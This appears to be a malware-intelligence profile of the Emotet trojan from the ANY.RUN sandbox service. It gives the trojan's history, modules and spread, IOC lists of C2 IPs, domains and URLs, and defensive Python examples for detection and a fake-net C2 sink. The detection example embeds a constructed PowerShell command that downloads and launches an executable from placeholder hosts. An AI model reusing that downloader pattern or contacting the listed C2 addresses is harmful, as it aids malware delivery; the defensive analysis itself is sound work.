
Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it was upgraded from a banking trojan into a highly destructive malware loader. It mostly targets corporate victims, but private users are infected as well through mass spam email campaigns.

Type: Trojan
Origin: ex-USSR
First seen: 1 June, 2014
Last seen: 26 September, 2025
Also known as: Heodo, Geodo

How to analyze Emotet with ANY.RUN


IOCs

IP addresses
50.125.99.70
92.207.145.74
50.100.215.149
37.120.175.15
87.248.77.159
185.97.32.6
54.39.181.130
24.206.17.102
179.52.236.96
208.180.149.228
200.56.104.44
216.176.21.143
216.251.1.1
118.244.214.210
181.229.155.11
86.98.71.86
67.43.253.189
120.150.206.156
189.130.50.85
159.65.76.245
Hashes

Domains
simplatecplc.com
bizercise.top
oilmotor.com.ua
proyectoin.com
ulukantasarim.com
woelf.in
sertecii.com
danisasellers.com
greatvacationgiveaways.com
zlc-aa.org
kids-education-support.com
cwbsa.org
uka.me
tagkarma.com
djkuhni.ru
dac-website.000webhostapp.com
vvk888.ru
easyneti.com
finnessemedia.com
coronadotx.com
URLs
http://162.241.242.173:8080/d97dhnk1Joy/ZOtXqb6B/zADA6/ygEOe594oTEgHZ4fmzU/
http://203.117.253.142/AG41L2Y78tmsZ1gjQQj/koRtBb4folCz9Dby6w/ILhWgBpLuOkrPqWWT/w4JiJ6kl/
http://209.141.54.221:8080/nUlV/
http://46.105.131.79:8080/VjUPEEfthrYI/UI3QSvE1imbFSE68M/fROfRFLt3HT465iheWM/
http://153.232.188.106/Tq02ofBHuVtKY/bE7aY3/KHPu/jHOpQq4/gW6u9gal8sJMB1Ub/dV2lhQ7MvHMmhM/
http://68.188.112.97/pNU01iszU0g/SI6713IQtJ/CSbnXMZt1nqfpHiArm/Ugv1adMgExRScs9tt/
http://45.55.219.163:443/F42Pnge2FlF/K1f3ewLeOdE9qo/
http://45.55.36.51:443/l4EtqoPkLXn/5MAQt/Nqll/6OSL1HEPO0M/
http://67.68.210.95/5Sib1/UsMb5Tn5Nsm1Tgt/GA0XfdIT/atrdDASSTOFZfwD/
http://173.73.87.96/s8kP2bPah/6YtFSQo5bonyq05/Mr6K8xYwaopfcuqhAST/G8UuRk58WX2FP/I9Ygp77CZwsxS9ac8G/wIuJSyGxGjw87Kvq/
http://173.73.87.96/96q5bKGAFONix/B6Bn02/EKYM/NPbSkjVcZy/
http://68.183.190.199:8080/pauauxOxFTc/fhLYUsmXA4oyMaCHSQ/TvJJptetaimuLV/WqbnOJDu2xFeGK/d5kl8WkH/nQp1aGg/
http://172.104.169.32:8080/7PT7hhx9heQ/HeH9dI42Ppn8e/
http://54.37.42.48:8080/9AAqGCMvwf5/lQNoa0AxEStSdjA/H3tm/93XensPM/nAm6J7XVOUg/0ALu/
http://38.88.126.202:8080/gHgktM6ery/
http://51.38.124.206/l5DWXxftw/DbqCAaE4dBrCx7/
http://185.215.227.107:443/85PAVEej/
http://45.55.36.51:443/w7Ayamt5SQFMOwJmDDj/4ZYO2QWj82Jnw/
http://45.55.36.51:443/pCyzicko6NasBnnuuXl/35HQBwD7CqS/
http://67.68.210.95/qqDxumeh7ryy68L/DeFMBQBNEB0I0/

What is Emotet Trojan?

Emotet is a highly sophisticated and destructive Trojan used to download and install other malware. First recorded in 2014, it was originally classified as a banking trojan, but over its lifetime Emotet gained advanced capabilities and evolved into a full malware distribution service.

So what makes Emotet so dangerous? Emotet can behave like a worm and spread across local networks, which makes it extremely hard to clean up: a single missed host can re-infect the rest. In addition, the trojan has advanced persistence and anti-analysis mechanics, such as detecting sandboxes and virtual machines, and it can generate false indicators to mislead researchers.

On top of that, the trojan is polymorphic, meaning that it changes its code between builds to bypass signature-based detection, so signatures alone are not a reliable defense against it. Emotet also receives updates from its command-and-control (C2) servers, fetching new modules and payloads much as an operating system fetches updates. This is how the trojan stealthily drops additional malware onto the infected machine.

It should also be noted that Emotet has a modular design, which makes it possible to adapt the malware to various tasks and to customize it for each campaign, giving the attackers maximum flexibility. Emotet's main targets are governments, corporations, small businesses and individuals, with a focus on Europe and North America.

General description of Emotet virus

The first version of Emotet, spotted in the wild in 2014, was designed to steal banking credentials by intercepting network traffic and was far more basic than the beast of a Trojan we know today. At that stage the malware targeted mainly banks in Germany and Austria, using only its native information-stealing toolset.

Version two followed shortly after, this time carrying several additional modules: money transfer, mail spam, DDoS and address book stealing. The third iteration of Emotet was released in 2015. This time the attackers focused on upgrading the evasion functionality of the malware and added Swiss banks to the list of potential victims.

The next overhaul of Emotet followed in December 2016, changing the attack vector. Early in its lifetime, Version 4 relied heavily on the RIG 4.0 exploit kit to get onto victims' computers, later switching primarily to mail spam. The same iteration also marked the moment when the primary use case of the malware shifted from its own banking module to dropping other Trojans onto infected machines.

Speaking of modules, Emotet can perform a large number of malicious activities, varying with the modules used in a particular campaign. Most versions included a spam module that continues the spread of the malware by sending malicious emails from the infected machine. Another typically included module is the credential stealer, which harvests saved credentials from web browsers and mail clients.

In 2017, Emotet was equipped with a spreader module, allowing the malware to propagate to other machines reachable over the local network. The virus also gained an address book stealer module, and this one is interesting: it analyzes the relationships between email senders and recipients and uses that information to make subsequent campaigns sent from the victim's PC more convincing, targeting friends, family members and colleagues of the victim with personalized spam emails.

Emotet not only provides flexible functionality through its modules and several evasion functions, it also puts a heavy emphasis on persistence. To stay on the infected machine, it injects into running processes (often explorer.exe), downloads additional payloads, creates Scheduled Tasks and modifies registry keys.


In January 2021, the Emotet botnet was taken down by law enforcement. The global effort, known as Operation Ladybird, located the malware's infrastructure around the globe, and at least two alleged members of the cybercriminal gang were arrested in Ukraine. Their names were not released.

Law enforcement and security researchers teamed up and simultaneously took over hundreds of Emotet command-and-control servers, disrupting the backup infrastructure as well. The researchers stood up their own machines at the IP addresses the infected bots called home to and served a neutralized payload that cut the bots off from the botnet.

As a result, Emotet's C2 servers stayed dark for almost ten months.

On November 14, 2021, Emotet came back with a new version. The botnet started spreading numerous maldocs and changed its tactics: where Emotet used to drop Trickbot or Qbot, it now also delivers Cobalt Strike directly, which significantly shortens the time between the initial infection and a ransomware attack.

Researchers also noticed that Emotet keeps bringing more and more C2 servers online. The new version introduced elliptic-curve cryptography (ECC) for its C2 traffic and modified the communication protocol, including a new initial check-in.

It should be noted that all of the versions mentioned are extremely destructive, and their attacks can have several consequences: loss of private data, an infected PC that is degraded or rendered completely unusable, and the financial cost of restoring the damaged infrastructure. In one reported case, a company spent more than one million dollars dealing with the aftermath of an Emotet attack.

Emotet malware analysis

A video recorded in the ANY.RUN malware hunting service displays the execution process of Emotet and allows the analyst to study the malware's behavior in detail. You can also investigate other malware such as FlawedAmmyy or Agent Tesla.

Figure 1: The process list generated by the ANY.RUN malware hunting service

Figure 2: Even more information about the execution of Emotet can be found in the customizable text reports generated by ANY.RUN

Emotet execution process

Emotet's primary distribution channel is malicious email spam campaigns. The first step in the infection chain is social engineering: tricking the potential victim into opening an attached Microsoft Office file. Once the file has been opened and macros are enabled, no further user action is needed.

The attached documents contain malicious VBA code that runs once the document is opened with macros enabled. In one common variant, the VBA code uses WMI to launch PowerShell, and the PowerShell script downloads the payload, a malicious executable, from a web server, typically trying a list of several URLs in turn. Notably, the PowerShell command line is passed in encoded form (Base64-encoded UTF-16LE, as accepted by the -EncodedCommand switch), so the URLs are not visible in the raw command line.

Emotet takes steps to maintain a presence on the infected system: it copies itself into a subfolder of %AppData% and sets an autorun value in the registry. Besides that, the malware lets its operators download additional payloads. Throughout the infection the malware exchanges information with its servers, and as the last step of execution Emotet waits for commands from its command-and-control servers.
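The two observable stages described above (the macro launching an encoded PowerShell downloader via WMI, and the copy under %AppData% registered as an autorun value) are what a SOC would want to detect from endpoint telemetry. The following is an added example, not code from ANY.RUN or from the Emotet samples on this page: it runs two detection rules over constructed, Sysmon-style process-creation and registry events, decodes the -EncodedCommand blob the same way PowerShell does, and pulls the download URLs out of it. The event format (pipe-separated key=value pairs), the field names, the sample script and the `.invalid` hosts are all assumptions made for the example.

```python
import base64
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Constructed stand-in for the PowerShell stage an Emotet macro launches:
# try each download URL in turn, save the first payload that works to %TEMP%, run it.
# The hosts are placeholders (.invalid TLD), not real IOCs.
SAMPLE_PS = (
    "$urls='http://example-one.invalid/wp-content/x1/','http://example-two.invalid/cgi/x2/';"
    "foreach($u in $urls){try{(New-Object Net.WebClient).DownloadFile($u,$env:TEMP+'\\t.exe');"
    "Start-Process ($env:TEMP+'\\t.exe');break}catch{}}"
)

def encode_powershell(script: str) -> str:
    """-EncodedCommand takes Base64 of the script as UTF-16LE (hence blobs starting 'JAB...')."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_powershell(blob: str) -> str:
    return base64.b64decode(blob).decode("utf-16-le")

# Constructed telemetry (assumed format: pipe-separated key=value, Sysmon-style field names).
# With the WMI launch path, powershell.exe's parent is WmiPrvSE.exe, not WINWORD.EXE itself.
SAMPLE_EVENTS = [
    "Event=ProcessCreate|ParentImage=C:\\Windows\\explorer.exe"
    "|Image=C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"
    "|CommandLine=WINWORD.EXE /n C:\\Users\\u\\Downloads\\invoice.doc",
    "Event=ProcessCreate|ParentImage=C:\\Windows\\System32\\svchost.exe"
    "|Image=C:\\Windows\\System32\\wbem\\WmiPrvSE.exe|CommandLine=WmiPrvSE.exe -secured -Embedding",
    "Event=ProcessCreate|ParentImage=C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    f"|CommandLine=powershell -w hidden -enc {encode_powershell(SAMPLE_PS)}",
    "Event=RegistryValueSet|Image=C:\\Users\\u\\AppData\\Local\\ifudq\\ifudq.exe"
    "|TargetObject=HKU\\S-1-5-21-1\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ifudq"
    "|Details=C:\\Users\\u\\AppData\\Local\\ifudq\\ifudq.exe",
    # Benign admin use of PowerShell from the desktop: must not fire.
    "Event=ProcessCreate|ParentImage=C:\\Windows\\explorer.exe"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell -File C:\\scripts\\backup.ps1",
]

# Parents that should never be spawning PowerShell on a user workstation.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "wmiprvse.exe"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand.
ENC_FLAG = re.compile(r"(?i)\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
URL_RE = re.compile(r"https?://[^\s'\"]+")

@dataclass
class Finding:
    rule: str
    image: str
    urls: List[str] = field(default_factory=list)  # decoded download URLs or the autorun path

def parse_event(line: str) -> Dict[str, str]:
    # split("=", 1) keeps the '=' padding of a Base64 blob inside the CommandLine value
    return dict(part.split("=", 1) for part in line.split("|"))

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def analyze(lines: List[str]) -> List[Finding]:
    findings: List[Finding] = []
    for line in lines:
        ev = parse_event(line)
        if (ev["Event"] == "ProcessCreate"
                and basename(ev["Image"]) == "powershell.exe"
                and basename(ev["ParentImage"]) in SUSPICIOUS_PARENTS):
            urls: List[str] = []
            m = ENC_FLAG.search(ev["CommandLine"])
            if m:
                try:
                    urls = URL_RE.findall(decode_powershell(m.group(1)))
                except (ValueError, UnicodeDecodeError):
                    pass  # truncated or mangled blob: still report the launch, without URLs
            findings.append(Finding("office_wmi_powershell", ev["Image"], urls))
        elif (ev["Event"] == "RegistryValueSet"
                and "\\currentversion\\run\\" in ev["TargetObject"].lower()
                and "\\appdata\\" in ev["Details"].lower()):
            findings.append(Finding("appdata_run_key", ev["Image"], [ev["Details"]]))
    return findings

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f.rule, f.image, *f.urls)
```

The decoded URLs are the IOCs worth blocking and sharing; the Run-key rule is deliberately scoped to values pointing into %AppData%, since that is where Emotet copies itself, and a Run value pointing at Program Files is far more likely to be legitimate software.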

Prevention of Emotet attacks

To minimize the risk of an Emotet infection, and the damage if one does occur, users are advised to follow standard best practices: do not open attachments or download files from suspicious emails, and keep antivirus software updated at all times.

For organizations, it is advised to restrict inbound SMB communication between client systems to prevent Emotet from spreading from one machine to another within the local network, to provide security training and instruct employees about the danger of mail spam, and to take all possible precautions to filter out potentially malicious emails at the mail gateway.

How does Emotet spread?

According to the analysis, the main distribution method of Emotet is malicious email campaigns. The trojan uses its address book stealer module to pull the contacts from the victim's email account and sends its payloads to the contacts harvested from the hijacked account.

Since potential victims receive an email from somebody they know and trust, Emotet has a very high chance of success. The received email usually contains a malicious attachment or a link to a malicious URL that downloads the malware and launches the payload when clicked.

However, email spam is not the only distribution method the malware uses. It may also take advantage of certain Windows vulnerabilities, letting the malware get onto a machine completely "silently", without the user ever knowing about it.

How to collect Emotet's IOCs using ANY.RUN?

For detailed Emotet analysis, ANY.RUN's "Fake net" feature is very useful. It intercepts HTTP requests and answers them with a 404 error, forcing the malware to reveal its list of command-and-control servers as it tries each one in turn.

Figure 3: An Emotet sample run with the "Fake net" feature turned on

To turn it on, open the "Advanced mode" of the "New task" window and check the box next to "Fake net" in the "Network" section.
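The same idea can be reproduced in a local lab: a sink that answers every HTTP request with 404 and records who was asked. Because a bot like Emotet treats a non-200 answer as a dead C2 and moves on to the next address in its list, the sink ends up logging the whole list. The code below is an added example, not ANY.RUN's implementation of "Fake net"; it assumes you redirect the analysis VM's traffic to it (for example by pointing the VM's default gateway or DNS at the host running it and NATing ports 80/443/8080 to the sink) and that the sample talks plain HTTP, which is what Emotet's C2 traffic used. The request details in the usage are constructed, using documentation IP ranges.

```python
import json
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Dict, List, Tuple

# Every request the sample makes is recorded here; this list is the IOC output of the sink.
OBSERVED: List[Dict[str, str]] = []

def record_request(method: str, host: str, path: str, user_agent: str) -> Tuple[int, Dict[str, str]]:
    """Sink logic, kept apart from the socket layer so it can be exercised offline.
    Returns the status to send back (always 404) and the entry that was logged."""
    entry = {"method": method, "host": host, "path": path, "ua": user_agent}
    OBSERVED.append(entry)
    return 404, entry

class FakeNetHandler(BaseHTTPRequestHandler):
    def _sink(self) -> None:
        status, _ = record_request(
            self.command,                       # GET / POST / HEAD
            self.headers.get("Host", ""),       # "ip:port" for Emotet, which calls IPs directly
            self.path,
            self.headers.get("User-Agent", ""),
        )
        self.send_response(status)
        self.send_header("Content-Length", "0")
        self.end_headers()

    do_GET = do_POST = do_HEAD = _sink

    def log_message(self, fmt, *args) -> None:
        pass  # OBSERVED is the log; keep stdout quiet

def unique_c2(entries: List[Dict[str, str]]) -> List[str]:
    """Collapse the observed requests into a de-duplicated host:port list in first-seen order."""
    seen: List[str] = []
    for e in entries:
        key = e["host"].lower()
        if key and key not in seen:
            seen.append(key)
    return seen

def serve(port: int = 8080) -> HTTPServer:
    """Start the sink in a background thread on the loopback address and return the server."""
    srv = HTTPServer(("127.0.0.1", port), FakeNetHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv

if __name__ == "__main__":
    server = serve(8080)
    print("fake-net sink on 127.0.0.1:8080, answering 404 to everything; Ctrl-C to dump the log")
    try:
        threading.Event().wait()
    except KeyboardInterrupt:
        server.shutdown()
        print(json.dumps(OBSERVED, indent=2))
        print("C2 candidates:", unique_c2(OBSERVED))
```

Two caveats a practitioner will hit: a sample that checks for a specific response body (or an HTTPS C2) will not be fooled by a bare 404, and the hosts a sample tries are only candidate C2s until confirmed, since some families mix decoys into the list.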


Conclusion

Emotet is one of the most sophisticated and destructive trojans. Since its introduction in 2014, the malware has undergone a substantial evolution, gaining many evasion features, obtaining worm-like functionality, and even shifting its main focus from information stealing to installing other trojans onto infected machines. With the ability to spread to adjacent systems, Emotet can easily infect every machine in a network, making cleanup after an attack a true nightmare.

The situation is made worse by the series of anti-analysis tricks the malware carries, which make analyzing it quite tricky. As a result, developing countermeasures is much more complicated than for more straightforward trojans.

Thankfully, modern online hunting services like ANY.RUN are equipped with equally advanced research functions and allow professionals to study cyber threats efficiently, helping researchers battle evasive malware like Emotet.
